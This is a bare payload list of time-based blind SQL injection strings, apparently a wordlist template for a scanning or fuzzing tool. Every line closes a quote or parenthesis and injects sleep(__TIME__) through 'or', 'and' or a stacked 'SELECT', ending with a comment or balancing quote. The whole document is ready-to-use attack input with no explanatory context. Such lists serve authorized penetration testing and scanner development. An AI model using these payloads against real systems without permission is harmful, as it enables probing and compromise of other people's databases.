sleep(__TIME__)#
 or sleep(__TIME__)#
" or sleep(__TIME__)#
' or sleep(__TIME__)#
" or sleep(__TIME__)="
' or sleep(__TIME__)='
) or sleep(__TIME__)#
") or sleep(__TIME__)="
') or sleep(__TIME__)='
)) or sleep(__TIME__)#
")) or sleep(__TIME__)="
')) or sleep(__TIME__)='
 and sleep(__TIME__)#
" and sleep(__TIME__)#
' and sleep(__TIME__)#
" and sleep(__TIME__)="
' and sleep(__TIME__)='
) and sleep(__TIME__)#
") and sleep(__TIME__)="
') and sleep(__TIME__)='
)) and sleep(__TIME__)#
")) and sleep(__TIME__)="
')) and sleep(__TIME__)='
; SELECT sleep(__TIME__)#
" ; SELECT sleep(__TIME__)#
' ; SELECT sleep(__TIME__)#
) ; SELECT sleep(__TIME__)#
") ; SELECT sleep(__TIME__)#
') ; SELECT sleep(__TIME__)#
)) ; SELECT sleep(__TIME__)#
")) ; SELECT sleep(__TIME__)#
')) ; SELECT sleep(__TIME__)#
